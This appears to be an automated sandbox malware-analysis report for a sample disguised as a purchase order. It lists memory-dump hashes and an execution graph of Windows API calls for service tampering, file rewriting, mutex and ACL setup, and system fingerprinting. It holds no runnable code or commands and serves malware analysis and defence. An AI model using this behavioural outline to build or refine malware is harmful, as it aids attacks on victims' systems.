                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1742034174.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_119d000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                                                                      • Instruction ID: 1e95febd666c4c7ddb05c88af6ff06dfc33a5038c84026f339f35872dd5b1402
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6511DC72404280CFDF06CF44E9C4B56BF72FB94324F24C2A9D9090B656C33AE45ACBA2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1742034174.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_119d000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                                                                      • Instruction ID: 0438bf7abd4c20aa42a3cb7b27c71f4dd7b88c642acb62483df3da1ff50e11a1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D311E176404280CFDF06CF54E5C4B16BF71FB84318F24C6A9D8090B256C336D45ACBA2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1742094048.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11ad000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                                                                      • Instruction ID: 58ed2f43c17f838455887c9d753a6cdee80a0458a5e37ffc8219eb06dd1c8b88
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9811BB79504680DFDB06CF54D5C4B15BFA1FB84224F24C6AAD8494B6A6C33AD40ACB62
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1742034174.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_119d000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 51b98fbe2f634b14e4e0085e2f9cb256622b24f1029045f9f94945632f2dc692
                                                                                                                                                                                                                                      • Instruction ID: 015594ca0cceb52346d03194b90376aa5b21bbd8d4ee8f22776b3c85d03262c3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51b98fbe2f634b14e4e0085e2f9cb256622b24f1029045f9f94945632f2dc692
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C201FC310087809AEF1C5A99DD8475FBF98DF41328F08C52AED180B146C3399440C672
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1742034174.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_119d000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 706deef7c5a3343a7c10ff17162386369ee020aecc2183af385ae77f9e24c471
                                                                                                                                                                                                                                      • Instruction ID: 5100083c7eed3d3fa0c955bc7d534fc6680509e3c88d9d61656848b025d6da7f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 706deef7c5a3343a7c10ff17162386369ee020aecc2183af385ae77f9e24c471
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69F0F6710083809EEB148E5ADCC8B66FFA8EF41338F18C45AED080F286C3799840CBB1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1760393104.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5960000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: (o^q$(o^q$,bq$,bq$Hbq
                                                                                                                                                                                                                                      • API String ID: 0-3486158592
                                                                                                                                                                                                                                      • Opcode ID: bce362db7130d05835db1eca94d8f46e0de7a7256470c5ee21914fca30d480e0
                                                                                                                                                                                                                                      • Instruction ID: aa5c95420b6e4dd6c60c04540fbc6622baa3c7e703c709745682a73b8895bc0c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bce362db7130d05835db1eca94d8f46e0de7a7256470c5ee21914fca30d480e0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4024B39A04615CFCB18CF69C988A6DBBB6FF88750B168169E816DB370DB31EC45CB50
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1784201616.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ac0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: PH^q$PH^q
                                                                                                                                                                                                                                      • API String ID: 0-1598597984
                                                                                                                                                                                                                                      • Opcode ID: 5abaeae1a66d7f065ac590b48f64b54652061481e06b584e234c1b06ca5b0a7d
                                                                                                                                                                                                                                      • Instruction ID: 72865f2c2f43d6a4abd5f0fbd284ab743796ca1e2deb8a00e626f6042da19181
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5abaeae1a66d7f065ac590b48f64b54652061481e06b584e234c1b06ca5b0a7d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2D1B574A00605CFDB18DF69C998AAAB7F1BF8D711F2580A8E515AB371DB31AD40CF60
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1760393104.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5960000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 60bb3da8c980ce5617f6ce139f7b4f258bb23b542d27403c3e9193c6e31cbbf3
                                                                                                                                                                                                                                      • Instruction ID: 6c6ca29f24bc1ae9e77161b68d7fc8fa63cd0cc70a93fab5071bad47ad03db87
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60bb3da8c980ce5617f6ce139f7b4f258bb23b542d27403c3e9193c6e31cbbf3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7A19170B002544FDB5DBBBC851436F6AABBBC8340F68852CD05AEB798CE389D438795

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:3.7%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:31.6%
                                                                                                                                                                                                                                      Signature Coverage:18.9%
                                                                                                                                                                                                                                      Total number of Nodes:449
                                                                                                                                                                                                                                      Total number of Limit Nodes:42
                                                                                                                                                                                                                                      execution_graph 21712 2bd520c 21715 2bfcbd0 21712->21715 21714 2bd5211 21716 2bfbe50 _wcslen 21715->21716 21716->21714 21716->21715 21717 2bfbfe9 21716->21717 21718 2bfc168 21716->21718 21720 2bd5d20 2 API calls 21716->21720 21721 2bfc78e CloseServiceHandle 21716->21721 21722 2bfbffd StrStrIW 21716->21722 21723 2bfc706 StrStrIW 21716->21723 21724 2bfbf68 StrStrIW 21716->21724 21725 2bfc72b StrStrIW 21716->21725 21727 2bfc399 StrStrIW 21716->21727 21729 2bfc0fd CloseServiceHandle 21716->21729 21730 2bfc7e4 StartServiceW 21716->21730 21733 2bfbf7e 21716->21733 21734 2bfc65a ChangeServiceConfigW 21716->21734 21735 2bdce90 21716->21735 21753 2bfa350 CloseServiceHandle 21716->21753 21717->21714 21754 2bfa905 LocalFree 21718->21754 21720->21716 21721->21716 21722->21716 21723->21716 21724->21716 21725->21716 21727->21716 21731 2bfc3a9 21727->21731 21729->21716 21730->21716 21731->21714 21732 2bfc36b OpenServiceW 21732->21716 21733->21730 21733->21732 21734->21716 21734->21717 21744 2bdcc9b _wcslen 21735->21744 21736 2bdd426 21739 2bdd42a CloseHandle 21736->21739 21740 2bdd8a1 CloseHandle 21736->21740 21737 2bdd5c5 CreateFileW 21737->21744 21738 2bdd729 GetFileSizeEx 21738->21740 21738->21744 21739->21744 21740->21744 21741 2bdcd5c lstrcmpiW 21741->21744 21743 2bd5d20 VirtualAlloc VirtualFree 21743->21744 21744->21716 21744->21735 21744->21736 21744->21737 21744->21738 21744->21739 21744->21740 21744->21741 21744->21743 21745 2bdcca0 lstrcmpiW 21744->21745 21747 2bdd049 SetFilePointerEx 21744->21747 21748 2bdd378 CloseHandle 21744->21748 21750 2bdcfbb GetFileTime 21744->21750 21751 2bdd903 21744->21751 21752 2bdcc92 21744->21752 21755 2bd8937 VirtualAlloc VirtualFree 21744->21755 21756 2bd8470 VirtualAlloc VirtualFree 21744->21756 21745->21744 21747->21744 21748->21744 21749 2c0fdfc 40 API calls 21749->21751 21750->21744 21751->21749 21751->21752 21752->21716 21753->21716 21754->21717 21755->21744 21651 36a9308 21652 36a9348 CloseHandle 21651->21652 21654 36a9379 21652->21654 21655 2bd5a3b 21656 2bd5a45 21655->21656 21661 2bd4f7c 21655->21661 21657 2bd51ae 21656->21657 21658 2bd5a4b CreateThread 21656->21658 21659 2bd5a59 RtlExitUserThread 21658->21659 21665 2bd5b1d 21659->21665 21660 2bd4f88 21661->21660 21668 2bd5d20 21661->21668 21664 2bd4f99 21666 2bd5d20 2 API calls 21665->21666 21667 2bd5b3c 21666->21667 21669 2bd5d22 21668->21669 21669->21664 21670 2bd5d39 VirtualAlloc 21669->21670 21672 2bd5d46 VirtualFree 21669->21672 21670->21669 21672->21664 21757 40cbf7 21758 40cc08 21757->21758 21792 40d534 HeapCreate 21758->21792 21761 40cc46 21794 41087e GetModuleHandleW 21761->21794 21765 40cc57 __RTC_Initialize 21828 411a15 21765->21828 21768 40cc66 21769 40cc72 GetCommandLineA 21768->21769 21962 40e79a 63 API calls 3 library calls 21768->21962 21843 412892 21769->21843 21772 40cc71 21772->21769 21776 40cc97 21882 41255f 21776->21882 21780 40cca8 21897 40e859 21780->21897 21783 40ccb0 21784 40ccbb 21783->21784 21965 40e79a 63 API calls 3 library calls 21783->21965 21903 4019f0 OleInitialize 21784->21903 21787 40ccd8 21788 40ccea 21787->21788 21957 40ea0a 21787->21957 21966 40ea36 63 API calls _doexit 21788->21966 21791 40ccef __close 21793 40cc3a 21792->21793 21793->21761 21960 40cbb4 63 API calls 3 library calls 21793->21960 21795 410892 21794->21795 21796 410899 21794->21796 21967 40e76a Sleep GetModuleHandleW 21795->21967 21798 410a01 21796->21798 21799 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 21796->21799 21989 410598 7 API calls __decode_pointer 21798->21989 21801 4108ec TlsAlloc 21799->21801 21800 410898 21800->21796 21804 40cc4c 21801->21804 21805 41093a TlsSetValue 21801->21805 21804->21765 21961 40cbb4 63 API calls 3 library calls 21804->21961 21805->21804 21806 41094b 21805->21806 21968 40ea54 6 API calls 3 library calls 21806->21968 21808 410950 21969 41046e TlsGetValue 21808->21969 21811 41046e __encode_pointer 6 API calls 21812 41096b 21811->21812 21813 41046e __encode_pointer 6 API calls 21812->21813 21814 41097b 21813->21814 21815 41046e __encode_pointer 6 API calls 21814->21815 21816 41098b 21815->21816 21979 40d564 InitializeCriticalSectionAndSpinCount __ioinit 21816->21979 21818 410998 21818->21798 21980 4104e9 6 API calls __crt_waiting_on_module_handle 21818->21980 21820 4109ac 21820->21798 21981 411cba 21820->21981 21824 4109df 21824->21798 21825 4109e6 21824->21825 21988 4105d5 63 API calls 5 library calls 21825->21988 21827 4109ee GetCurrentThreadId 21827->21804 22018 40e1d8 21828->22018 21830 411a21 GetStartupInfoA 21831 411cba __calloc_crt 63 API calls 21830->21831 21837 411a42 21831->21837 21832 411c60 __close 21832->21768 21833 411bdd GetStdHandle 21838 411ba7 21833->21838 21834 411c42 SetHandleCount 21834->21832 21835 411cba __calloc_crt 63 API calls 21835->21837 21836 411bef GetFileType 21836->21838 21837->21832 21837->21835 21837->21838 21840 411b2a 21837->21840 21838->21832 21838->21833 21838->21834 21838->21836 22020 41389c InitializeCriticalSectionAndSpinCount __close 21838->22020 21839 411b53 GetFileType 21839->21840 21840->21832 21840->21838 21840->21839 22019 41389c InitializeCriticalSectionAndSpinCount __close 21840->22019 21844 4128b0 GetEnvironmentStringsW 21843->21844 21851 4128cf 21843->21851 21845 4128b8 21844->21845 21846 4128c4 GetLastError 21844->21846 21847 4128eb GetEnvironmentStringsW 21845->21847 21848 4128fa WideCharToMultiByte 21845->21848 21846->21851 21847->21848 21852 40cc82 21847->21852 21856 41295d FreeEnvironmentStringsW 21848->21856 21857 41292e 21848->21857 21849 412971 GetEnvironmentStrings 21849->21852 21853 412981 21849->21853 21850 412968 21850->21849 21850->21852 21851->21845 21851->21850 21869 4127d7 21852->21869 22023 411c75 63 API calls _malloc 21853->22023 21856->21852 22021 411c75 63 API calls _malloc 21857->22021 21860 41299b 21862 4129a2 FreeEnvironmentStringsA 21860->21862 21863 4129ae ___crtGetEnvironmentStringsA 21860->21863 21861 412934 21861->21856 21864 41293c WideCharToMultiByte 21861->21864 21862->21852 21867 4129b8 FreeEnvironmentStringsA 21863->21867 21865 412956 21864->21865 21866 41294e 21864->21866 21865->21856 22022 40b6b5 63 API calls 2 library calls 21866->22022 21867->21852 21870 4127f1 GetModuleFileNameA 21869->21870 21871 4127ec 21869->21871 21873 412818 21870->21873 22030 41446b 107 API calls __setmbcp 21871->22030 22024 41263d 21873->22024 21876 40cc8c 21876->21776 21963 40e79a 63 API calls 3 library calls 21876->21963 21877 412854 22031 411c75 63 API calls _malloc 21877->22031 21879 41285a 21879->21876 21880 41263d _parse_cmdline 73 API calls 21879->21880 21881 412874 21880->21881 21881->21876 21883 412568 21882->21883 21886 41256d _strlen 21882->21886 22033 41446b 107 API calls __setmbcp 21883->22033 21884 40cc9d 21884->21780 21964 40e79a 63 API calls 3 library calls 21884->21964 21886->21884 21887 411cba __calloc_crt 63 API calls 21886->21887 21889 4125a2 _strlen 21887->21889 21888 412600 22036 40b6b5 63 API calls 2 library calls 21888->22036 21889->21884 21889->21888 21891 411cba __calloc_crt 63 API calls 21889->21891 21892 412626 21889->21892 21895 4125e7 21889->21895 22034 40ef42 63 API calls __cftof_l 21889->22034 21891->21889 22037 40b6b5 63 API calls 2 library calls 21892->22037 21895->21889 22035 40e61c 10 API calls 3 library calls 21895->22035 21898 40e867 __IsNonwritableInCurrentImage 21897->21898 22038 413586 21898->22038 21900 40e885 __initterm_e 21902 40e8a4 __IsNonwritableInCurrentImage __initterm 21900->21902 22042 40d2bd 74 API calls __cinit 21900->22042 21902->21783 21904 401ab9 21903->21904 22043 40b99e 21904->22043 21906 401abf 21907 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 21906->21907 21937 402467 21906->21937 21908 401dc3 CloseHandle GetModuleHandleA 21907->21908 21916 401c55 21907->21916 22056 401650 21908->22056 21910 401e8b FindResourceA LoadResource LockResource SizeofResource 22058 40b84d 21910->22058 21914 401c9c CloseHandle 21914->21787 21915 401ecb _memset 21917 401efc SizeofResource 21915->21917 21916->21914 21920 401cf9 Module32Next 21916->21920 21918 401f1c 21917->21918 21919 401f5f 21917->21919 21918->21919 22114 401560 __VEC_memcpy ___sbh_free_block 21918->22114 21921 401f92 _memset 21919->21921 22115 401560 __VEC_memcpy ___sbh_free_block 21919->22115 21920->21908 21928 401d0f 21920->21928 21924 401fa2 FreeResource 21921->21924 21925 40b84d _malloc 63 API calls 21924->21925 21926 401fbb SizeofResource 21925->21926 21927 401fe5 _memset 21926->21927 21929 4020aa LoadLibraryA 21927->21929 21928->21914 21932 401dad Module32Next 21928->21932 21930 401650 21929->21930 21931 40216c GetProcAddress 21930->21931 21933 4021aa 21931->21933 21931->21937 21932->21908 21932->21928 21933->21937 22088 4018f0 21933->22088 21935 40243f 21935->21937 22116 40b6b5 63 API calls 2 library calls 21935->22116 21937->21787 21938 4021f1 21938->21935 22100 401870 21938->22100 21940 402269 VariantInit 21941 401870 76 API calls 21940->21941 21942 40228b VariantInit 21941->21942 21943 4022a7 21942->21943 21944 4022d9 SafeArrayCreate SafeArrayAccessData 21943->21944 22105 40b350 21944->22105 21947 40232c 21948 402354 SafeArrayDestroy 21947->21948 21956 40235b 21947->21956 21948->21956 21949 402392 SafeArrayCreateVector 21950 4023a4 21949->21950 21951 4023bc VariantClear VariantClear 21950->21951 22107 4019a0 21951->22107 21954 40242e 21955 4019a0 66 API calls 21954->21955 21955->21935 21956->21949 22144 40e8de 21957->22144 21959 40ea1b 21959->21788 21960->21761 21961->21765 21962->21772 21963->21776 21964->21780 21965->21784 21966->21791 21967->21800 21968->21808 21970 4104a7 GetModuleHandleW 21969->21970 21971 410486 21969->21971 21973 4104c2 GetProcAddress 21970->21973 21974 4104b7 21970->21974 21971->21970 21972 410490 TlsGetValue 21971->21972 21976 41049b 21972->21976 21978 41049f 21973->21978 21990 40e76a Sleep GetModuleHandleW 21974->21990 21976->21970 21976->21978 21977 4104bd 21977->21973 21977->21978 21978->21811 21979->21818 21980->21820 21982 411cc3 21981->21982 21984 4109c5 21982->21984 21985 411ce1 Sleep 21982->21985 21991 40e231 21982->21991 21984->21798 21987 4104e9 6 API calls __crt_waiting_on_module_handle 21984->21987 21986 411cf6 21985->21986 21986->21982 21986->21984 21987->21824 21988->21827 21990->21977 21992 40e23d __close 21991->21992 21993 40e274 _memset 21992->21993 21994 40e255 21992->21994 21997 40e2e6 HeapAlloc 21993->21997 22001 40e26a __close 21993->22001 22006 40d6e0 21993->22006 22013 40def2 5 API calls 2 library calls 21993->22013 22014 40e32d LeaveCriticalSection _doexit 21993->22014 22015 40d2e3 6 API calls __decode_pointer 21993->22015 22004 40bfc1 63 API calls __getptd_noexit 21994->22004 21996 40e25a 22005 40e744 6 API calls 2 library calls 21996->22005 21997->21993 22001->21982 22004->21996 22007 40d6f5 22006->22007 22008 40d708 EnterCriticalSection 22006->22008 22016 40d61d 63 API calls 10 library calls 22007->22016 22008->21993 22010 40d6fb 22010->22008 22017 40e79a 63 API calls 3 library calls 22010->22017 22012 40d707 22012->22008 22013->21993 22014->21993 22015->21993 22016->22010 22017->22012 22018->21830 22019->21840 22020->21838 22021->21861 22022->21865 22023->21860 22026 41265c 22024->22026 22028 4126c9 22026->22028 22032 416836 73 API calls x_ismbbtype_l 22026->22032 22027 4127c7 22027->21876 22027->21877 22028->22027 22029 416836 73 API calls _parse_cmdline 22028->22029 22029->22028 22030->21870 22031->21879 22032->22026 22033->21886 22034->21889 22035->21895 22036->21884 22037->21884 22039 41358c 22038->22039 22040 41046e __encode_pointer 6 API calls 22039->22040 22041 4135a4 22039->22041 22040->22039 22041->21900 22042->21902 22045 40b9aa __close _strnlen 22043->22045 22044 40b9b8 22117 40bfc1 63 API calls __getptd_noexit 22044->22117 22045->22044 22048 40b9ec 22045->22048 22047 40b9bd 22118 40e744 6 API calls 2 library calls 22047->22118 22050 40d6e0 __lock 63 API calls 22048->22050 22051 40b9f3 22050->22051 22119 40b917 121 API calls 3 library calls 22051->22119 22053 40b9ff 22120 40ba18 LeaveCriticalSection _doexit 22053->22120 22054 40b9cd __close 22054->21906 22057 4017cc ___crtGetEnvironmentStringsA 22056->22057 22057->21910 22059 40b900 22058->22059 22060 40b85f 22058->22060 22130 40d2e3 6 API calls __decode_pointer 22059->22130 22062 40b870 22060->22062 22068 401ebf 22060->22068 22069 40b8bc RtlAllocateHeap 22060->22069 22071 40b8ec 22060->22071 22074 40b8f1 22060->22074 22126 40b7fe 63 API calls 4 library calls 22060->22126 22127 40d2e3 6 API calls __decode_pointer 22060->22127 22062->22060 22121 40ec4d 63 API calls 2 library calls 22062->22121 22122 40eaa2 63 API calls 7 library calls 22062->22122 22123 40e7ee 22062->22123 22063 40b906 22131 40bfc1 63 API calls __getptd_noexit 22063->22131 22076 40af66 22068->22076 22069->22060 22128 40bfc1 63 API calls __getptd_noexit 22071->22128 22129 40bfc1 63 API calls __getptd_noexit 22074->22129 22078 40af70 22076->22078 22077 40b84d _malloc 63 API calls 22077->22078 22078->22077 22079 40af8a 22078->22079 22084 40af8c std::bad_alloc::bad_alloc 22078->22084 22136 40d2e3 6 API calls __decode_pointer 22078->22136 22079->21915 22081 40afb2 22138 40af49 63 API calls std::exception::exception 22081->22138 22083 40afbc 22139 40cd39 RaiseException 22083->22139 22084->22081 22137 40d2bd 74 API calls __cinit 22084->22137 22087 40afca 22089 401903 lstrlenA 22088->22089 22090 4018fc 22088->22090 22140 4017e0 73 API calls 3 library calls 22089->22140 22090->21938 22092 40191f MultiByteToWideChar 22093 401940 GetLastError 22092->22093 22094 401996 22092->22094 22095 40194b MultiByteToWideChar 22093->22095 22096 40198d 22093->22096 22094->21938 22141 4017e0 73 API calls 3 library calls 22095->22141 22096->22094 22142 401030 GetLastError 22096->22142 22098 401970 MultiByteToWideChar 22098->22096 22101 40af66 75 API calls 22100->22101 22102 40187c 22101->22102 22103 401885 SysAllocString 22102->22103 22104 4018a4 22102->22104 22103->22104 22104->21940 22106 40231a SafeArrayUnaccessData 22105->22106 22106->21947 22108 4019aa InterlockedDecrement 22107->22108 22113 4019df VariantClear 22107->22113 22109 4019b8 22108->22109 22108->22113 22110 4019c2 SysFreeString 22109->22110 22112 4019c9 22109->22112 22109->22113 22110->22112 22143 40aec0 64 API calls 2 library calls 22112->22143 22113->21954 22114->21918 22115->21921 22116->21937 22117->22047 22119->22053 22120->22054 22121->22062 22122->22062 22132 40e7c3 GetModuleHandleW 22123->22132 22126->22060 22127->22060 22128->22074 22129->22068 22130->22063 22131->22068 22133 40e7d7 GetProcAddress 22132->22133 22134 40e7ec ExitProcess 22132->22134 22133->22134 22135 40e7e7 CorExitProcess 22133->22135 22135->22134 22136->22078 22137->22081 22138->22083 22139->22087 22140->22092 22141->22098 22143->22113 22145 40e8ea __close 22144->22145 22146 40d6e0 __lock 63 API calls 22145->22146 22147 40e8f1 22146->22147 22148 40e9ba __initterm 22147->22148 22149 40e91d 22147->22149 22163 40e9f5 22148->22163 22168 4104e9 6 API calls __crt_waiting_on_module_handle 22149->22168 22153 40e928 22154 40e9aa __initterm 22153->22154 22169 4104e9 6 API calls __crt_waiting_on_module_handle 22153->22169 22154->22148 22156 40e9f2 __close 22156->21959 22158 40e9e9 22159 40e7ee _doexit 4 API calls 22158->22159 22159->22156 22160 4104e0 6 API calls __init_pointers 22161 40e93d 22160->22161 22161->22154 22161->22160 22162 4104e9 6 API calls __decode_pointer 22161->22162 22162->22161 22164 40e9d6 22163->22164 22165 40e9fb 22163->22165 22164->22156 22167 40d606 LeaveCriticalSection 22164->22167 22170 40d606 LeaveCriticalSection 22165->22170 22167->22158 22168->22153 22169->22161 22170->22164 22171 2bd5085 22172 2bd506f 22171->22172 22173 2bd5089 22171->22173 22176 2bf8550 22172->22176 22175 2bd5078 22179 2bf8556 22176->22179 22177 2bf8145 GetLastError 22191 2bf7dd7 22177->22191 22192 2bf7d37 22177->22192 22178 2bf8579 FreeSid 22178->22179 22179->22176 22179->22177 22179->22178 22181 2bf8bc1 GetLastError 22179->22181 22182 2bf8986 SetEntriesInAclW 22179->22182 22184 2bf7d30 22179->22184 22185 2bf89cd OpenMutexW 22179->22185 22186 2bf890b LocalFree 22179->22186 22189 2bf8599 22179->22189 22179->22191 22179->22192 22196 2bf896a wsprintfW 22179->22196 22197 2bf8953 AllocateAndInitializeSid 22179->22197 22198 2bf7d20 22179->22198 22180 2bf8209 GetUserNameW 22180->22191 22180->22192 22181->22179 22182->22179 22183 2bf83fb GetUserNameW 22183->22191 22190 2bf7d6c GetVolumeInformationW 22184->22190 22184->22192 22185->22175 22186->22179 22188 2bf824a GetLastError 22188->22175 22188->22191 22189->22184 22189->22196 22190->22175 22191->22177 22191->22180 22191->22183 22191->22184 22191->22188 22191->22190 22191->22192 22193 2bf836e GetLastError 22191->22193 22195 2bf7fd4 GetLastError 22191->22195 22191->22198 22200 2bf7f6b GetVolumeInformationW 22191->22200 22192->22175 22193->22191 22194 2bf7d83 GetWindowsDirectoryW 22194->22184 22194->22192 22195->22191 22196->22184 22197->22179 22198->22184 22198->22190 22198->22192 22198->22194 22199 2bf7e06 GetComputerNameW 22198->22199 22199->22192 22200->22191 22201 36a0890 22202 36a08b1 22201->22202 22203 36a097a 22202->22203 22206 36a1838 22202->22206 22209 36a3bf3 22202->22209 22212 36a9080 22206->22212 22211 36a9080 VirtualProtect 22209->22211 22210 36a3c12 22211->22210 22214 36a9093 22212->22214 22216 36a9130 22214->22216 22217 36a9178 VirtualProtect 22216->22217 22219 36a1851 22217->22219 21673 2bdaaf0 21674 2bdab06 21673->21674 21678 2bdab57 21674->21678 21679 2bd6490 21674->21679 21681 2bd5f10 21679->21681 21682 2bd5d90 21679->21682 21680 2bd6084 SetFilePointerEx 21680->21681 21681->21680 21681->21682 21683 2c0faf0 21682->21683 21684 2c0fafd 21683->21684 21688 2c0fb84 21683->21688 21686 2c0fb2a 21684->21686 21684->21688 21689 2c1032f 21686->21689 21702 2c11a1b 21 API calls 2 library calls 21686->21702 21687 2c108d6 21687->21678 21690 2c0fbda 21688->21690 21691 2c0fc05 21688->21691 21689->21678 21694 2c0fc38 21690->21694 21695 2c11167 21690->21695 21696 2c1116e 21690->21696 21691->21694 21701 2c10fe0 21 API calls __startOneArgErrorHandling 21691->21701 21693 2c0fc22 21693->21678 21694->21678 21703 2c10ff7 21 API calls __startOneArgErrorHandling 21695->21703 21704 2c10fe0 21 API calls __startOneArgErrorHandling 21696->21704 21699 2c1116c 21699->21678 21700 2c11173 21700->21678 21701->21693 21702->21687 21703->21699 21704->21700 21705 2bd4b70 GetUserDefaultUILanguage 21706 2bd4b82 21705->21706 21707 2bd6b50 21708 2bd6b57 21707->21708 21711 2bd5f10 21707->21711 21709 2bd6084 SetFilePointerEx 21709->21711 21710 2bd5d90 21711->21709 21711->21710 22220 2bdb180 22229 2bdb0de 22220->22229 22221 2bdb2a7 SetFilePointerEx 22224 2bdb1df 22221->22224 22225 2bdb1c6 22221->22225 22222 2bdb196 22223 2bdb3a6 22222->22223 22222->22225 22226 2bdb328 SetFilePointerEx 22223->22226 22227 2bdb3b2 22223->22227 22225->22224 22228 2bdb2e0 WriteFile 22225->22228 22229->22220 22229->22221 22229->22222 22229->22226 22230 2bdb0d0 SetFilePointerEx 22229->22230 22231 2bdb253 22229->22231 22230->22229 22232 2bdb054 22230->22232

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
